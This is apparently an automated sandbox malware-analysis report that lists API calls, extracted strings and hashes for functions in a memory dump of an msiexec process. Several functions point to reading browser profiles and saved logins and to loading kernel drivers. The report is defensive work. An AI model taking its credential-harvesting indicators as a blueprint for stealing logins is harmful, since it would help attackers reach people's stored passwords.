                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                          • API String ID: 2080319088-3046471546
                                                                                                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                          APIs
                                                                                                          • EndDialog.USER32(?,?), ref: 00413221
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                          • memset.MSVCRT ref: 00413292
                                                                                                          • memset.MSVCRT ref: 004132B4
                                                                                                          • memset.MSVCRT ref: 004132CD
                                                                                                          • memset.MSVCRT ref: 004132E1
                                                                                                          • memset.MSVCRT ref: 004132FB
                                                                                                          • memset.MSVCRT ref: 00413310
                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                          • memset.MSVCRT ref: 004133C0
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                          • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                          • wcscpy.MSVCRT ref: 0041341F
                                                                                                          • _snwprintf.MSVCRT ref: 0041348E
                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                          • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                          Strings
                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                          • {Unknown}, xrefs: 004132A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                          • API String ID: 4111938811-1819279800
                                                                                                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                          • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                          • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                          • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                          • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                          • String ID:
                                                                                                          • API String ID: 829165378-0
                                                                                                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00404172
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          • wcscpy.MSVCRT ref: 004041D6
                                                                                                          • wcscpy.MSVCRT ref: 004041E7
                                                                                                          • memset.MSVCRT ref: 00404200
                                                                                                          • memset.MSVCRT ref: 00404215
                                                                                                          • _snwprintf.MSVCRT ref: 0040422F
                                                                                                          • wcscpy.MSVCRT ref: 00404242
                                                                                                          • memset.MSVCRT ref: 0040426E
                                                                                                          • memset.MSVCRT ref: 004042CD
                                                                                                          • memset.MSVCRT ref: 004042E2
                                                                                                          • _snwprintf.MSVCRT ref: 004042FE
                                                                                                          • wcscpy.MSVCRT ref: 00404311
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                          • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                          • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                          • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                          • API String ID: 667068680-2887671607
                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                          • API String ID: 1607361635-601624466
                                                                                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                          APIs
                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 1043902810-0
                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                          APIs
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                          • _snwprintf.MSVCRT ref: 0044488A
                                                                                                          • wcscpy.MSVCRT ref: 004448B4
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                          • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                          • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                          • API String ID: 3330709923-517860148
                                                                                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                          • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                          • String ID: logins$null
                                                                                                          • API String ID: 2148543256-2163367763
                                                                                                          • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                          • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                          APIs
                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
